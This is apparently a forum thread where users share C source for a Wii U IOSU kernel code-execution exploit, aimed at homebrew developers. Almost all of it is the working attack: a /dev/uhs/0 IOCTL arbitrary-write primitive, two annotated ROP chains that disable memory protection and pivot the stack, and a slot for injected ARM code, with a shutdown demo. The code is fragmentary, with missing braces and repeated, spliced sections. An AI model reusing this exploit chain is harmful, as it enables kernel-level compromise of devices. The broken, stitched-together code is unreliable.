    DCFlushRange((void*)0xF4140000, sizeof(execute_me));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4140000, sizeof(execute_me));   //! |for final chain inside MEM1

int uhs_write32(int arm_addr, int val) {
    ayylmao[520] = arm_addr - 24;                  //!  The address to be overwritten, minus 24 bytes
    DCFlushRange(ayylmao, 521 * 4);                //! |Make CPU fetch new data (with updated adress)
    DCInvalidateRange(ayylmao, 521 * 4);           //! |for "ayylmao"
    OSSleepTicks(0x200000);                        //!  Improves stability
    int request_buffer[] = { -(0xBEA2C), val };      //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
    int output_buffer[32];
    return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));

Put your code into execute_me and it'll execute. You have about 0x5D0 bytes of space. The above code will simply shut your console down as a demonstration.

The big problem with kernel priviledges is the high risk of messing with the system's software.
This is clearly intended for developers who have a functional hardware mod and know how to restore the system.

Plus did you really have to pick such a disgusting username? It's kinda hard to be thankful to Hillary.


Dec 7, 2015
United Kingdom
Here's IOSU kernel code execution (using the IOS_CreateThread vector which is described on wiiubrew):

#include <string.h>
#include <stdarg.h>
#include <stdlib.h>
#include <malloc.h>
#include <unistd.h>
#include "dynamic_libs/os_functions.h"
#include "dynamic_libs/fs_functions.h"
#include "dynamic_libs/gx2_functions.h"
#include "dynamic_libs/sys_functions.h"
#include "dynamic_libs/vpad_functions.h"
#include "dynamic_libs/padscore_functions.h"
#include "dynamic_libs/socket_functions.h"
#include "dynamic_libs/ax_functions.h"
#include "fs/fs_utils.h"
#include "fs/sd_fat_devoptab.h"
#include "system/memory.h"
#include "utils/logger.h"
#include "utils/utils.h"
#include "common/common.h"
#include "main.h"

int dev_uhs_0_handle;

/* YOUR ARM CODE HERE (starts at 0x08122500) */
int execute_me[] = {
    0xE3A00000,       // MOV R0, #0
    0xE12FFF1E,       // BX LR

#define CHAIN_START         0x1016AD40
#define SHUTDOWN         0x1012EE4C
#define SIMPLE_RETURN      0x101014E4
#define SOURCE            (0x120000)

/* ROP CHAIN STARTS HERE (0x1015BD78) */
int final_chain[] = {
    0x101236f3,        // 0x00     POP {R1-R7,PC}
    0x0,               // 0x04     arg
    0x0812974C,        // 0x08     stackptr     CMP R3, #1; STREQ R1, [R12]; BX LR
    0x68,              // 0x0C     stacksize
    0x10101638,        // 0x10
    0x0,               // 0x14
    0x0,               // 0x18
    0x0,               // 0x1C
    0x1010388C,        // 0x20     CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
    0x0,               // 0x24
    0x0,               // 0x28
    0x1012CFEC,        // 0x2C     MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x30
    0x0,               // 0x34
    IOS_CREATETHREAD,  // 0x38
    0x1,               // 0x3C
    0x2,               // 0x40
    0x10123a9f,        // 0x44     POP {R0,R1,R4,PC}
    0x0812A314,        // 0x48     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xEE030F10,        // 0x4C     value: MCR    P15, #0, R0, C3, C0, #0 (set dacr to R0)
    0x0,               // 0x50
    0x10123a8b,        // 0x54     POP {R3,R4,PC}
    0x1,               // 0x58     R3 must be 1 for the arbitrary write
    0x0,               // 0x5C
    0x1010CD18,        // 0x60     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x64
    0x0,               // 0x68
    0x1012EE64,        // 0x6C     set_panic_behavior (arbitrary write)
    0x0,               // 0x70
    0x0,               // 0x74
    0x10123a9f,        // 0x78     POP {R0,R1,R4,PC}
    0x0812A314 + 0x4,  // 0x7C     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xE1A0D001,        // 0x80     value: MOV SP, R1
    0x0,               // 0x84
    0x10123a8b,        // 0x88     POP {R3,R4,PC}
    0x1,               // 0x8C     R3 must be 1 for the arbitrary write
    0x0,               // 0x90
    0x1010CD18,        // 0x94     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x98
    0x0,               // 0x9C
    0x1012EE64,        // 0xA0     set_panic_behavior (arbitrary write)
    0x0,               // 0xA4
    0x0,               // 0xA8
    0x10123a9f,        // 0xAC     POP {R0,R1,R4,PC}
    0x0812A314 + 0x8,  // 0xB0     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xE8BD800F,        // 0xB4     value: LDMFD SP!, {R0-R3,PC}
    0x0,               // 0xB8
    0x10123a8b,        // 0xBC     POP {R3,R4,PC}
    0x1,               // 0xC0     R3 must be 1 for the arbitrary write
    0x0,               // 0xC4
    0x1010CD18,        // 0xC8     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0xCC
    0x0,               // 0xD0
    0x1012EE64,        // 0xD4     set_panic_behavior (arbitrary write)
    0x0,               // 0xD8
    0x0,               // 0xDC
    0x10123a9f,        // 0xE0     POP {R0,R1,R4,PC}
    0xFFFFFFFF,        // 0xE4     enable read/write everywhere
    0x1015BD78 + 0xF4, // 0xE8     location of privileged stack
    0x0,               // 0xEC
    0x1012EB8C,        // 0xF0     IOS_GetUpTime64 (privileged stack pivot) (ends in LDMFD SP!, {R0-R3,PC})
    0x08122500,        // 0xF4     destination
    0x00140000,        // 0xF8     source
    sizeof(execute_me),// 0xFC     length
    0x0,               // 0x100
    0x08131AE4,        // 0x104    BL KERNEL_MEMCPY; MOV R0, R4; ADD SP, SP, #8; LDMFD SP!, {R4-R8,PC}
    0x0,               // 0x108
    0x0,               // 0x10C
    0xFFFFDC48,        // 0x110    Will be the LR: shutdown syscall
    0x0,               // 0x114
    0x0,               // 0x118
    0x0,               // 0x11C
    0x0,               // 0x120
    0x0812A124,        // 0x124    MOV LR, R4; MOV R0, LR; LDMFD SP!, {R4,PC}
    0x0,               // 0x128 
    0x08122500,        // 0x12C    Jump to code!

int second_chain[] = {
    0x10123a9f, // 0x00         POP {R0,R1,R4,PC}
    CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000,     // 0x04         destination
    0x0,        // 0x08     
    0x0,        // 0x0C     
    0x101063db, // 0x10         POP {R1,R2,R5,PC}
    0x00130000, // 0x14         source
    sizeof(final_chain),          // 0x18         length
    0x0,        // 0x1C     
    0x10106D4C, // 0x20         BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
    0x0,        // 0x24     
    0x0,        // 0x28     
    0x101236f3, // 0x2C         POP {R1-R7,PC}
    0x0,        // 0x30         arg
    0x101001DC, // 0x34         stackptr
    0x68,       // 0x38         stacksize
    0x10101634, // 0x3C         proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
    0x0,        // 0x40
    0x0,        // 0x44
    0x0,        // 0x48
    0x1010388C, // 0x4C         CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
    0x0,        // 0x50
    0x0,        // 0x54
    0x1012CFEC, // 0x58         MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,        // 0x5C
    0x0,        // 0x60
    0x1,        // 0x68         priority
    0x2,        // 0x6C         flags
    0x0,        // 0x70
    0x0,        // 0x74
    0x101063db, // 0x78         POP {R1,R2,R5,PC}
    0x0,        // 0x7C     
    -(0x240 + 0xF000), // 0x80  stack offset
    0x0,        // 0x84     
    0x1011D424, // 0x88         LDMFD SP!, {R4-R11,PC}
    0x0,        // 0x8C     
    0x0,        // 0x90     
    0x0,        // 0x94     
    0x0,        // 0x98     
    0x0,        // 0x9C     
    0x0,        // 0xA0     
    0x0,        // 0xA4     
    0x4,        // 0xA8         R11 must equal 4 in order to pivot the stack
    0x1012EA68, // 0xAC         stack pivot

int Menu_Main(void) {
    InitOSFunctionPointers();                  //! Init coreinit functions adresses
    dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0);   //! Open /dev/uhs/0 IOS node
    uhs_exploit_init();                        //! Init variables for the exploit

                                              //!------ROP CHAIN-------
    uhs_write32(CHAIN_START + 0x14, CHAIN_START + 0x14 + 0x4 + 0x20);
    uhs_write32(CHAIN_START + 0x10, 0x1011814C);
    uhs_write32(CHAIN_START + 0xC, SOURCE);

    uhs_write32(CHAIN_START, 0x1012392b); // pop {R4-R6,PC}

    IOS_Close(dev_uhs_0_handle);               //! Close /dev/uhs/0 IOS node
    return EXIT_SUCCESS;                     //! Exit from HBL

//!------Variables used in exploit------
int *pretend_root_hub = (int*)0xF5003ABC;
int *ayylmao = (int*)0xF4500000;

void uhs_exploit_init() {
    ayylmao[5] = 1;
    ayylmao[8] = 0x500000;

    memcpy((char*)(0xF4120000), second_chain, sizeof(second_chain));
    memcpy((char*)(0xF4130000), final_chain, sizeof(final_chain));
    memcpy((char*)(0xF4140000), execute_me, sizeof(execute_me));

    pretend_root_hub[33] = 0x500000;
    pretend_root_hub[78] = 0;

    DCFlushRange(pretend_root_hub + 33, 200);      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange(pretend_root_hub + 33, 200);   //! |for "pretend_root_hub"

    DCFlushRange((void*)0xF4120000, sizeof(second_chain));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4120000, sizeof(second_chain));   //! |for second chain inside MEM1
    DCFlushRange((void*)0xF4130000, sizeof(final_chain));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4130000, sizeof(final_chain));   //! |for final chain inside MEM1
    DCFlushRange((void*)0xF4140000, sizeof(execute_me));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4140000, sizeof(execute_me));   //! |for final chain inside MEM1

int uhs_write32(int arm_addr, int val) {
    ayylmao[520] = arm_addr - 24;                  //!  The address to be overwritten, minus 24 bytes
    DCFlushRange(ayylmao, 521 * 4);                //! |Make CPU fetch new data (with updated adress)
    DCInvalidateRange(ayylmao, 521 * 4);           //! |for "ayylmao"
    OSSleepTicks(0x200000);                        //!  Improves stability
    int request_buffer[] = { -(0xBEA2C), val };      //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
    int output_buffer[32];
    return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));

Put your code into execute_me and it'll execute. You have about 0x5D0 bytes of space. The above code will simply shut your console down as a demonstration.
This is it, gg. IOSU is dead.
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    what are you looking at?
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    I rather enjoy a life of taking it easy. I haven't reached that life yet though.
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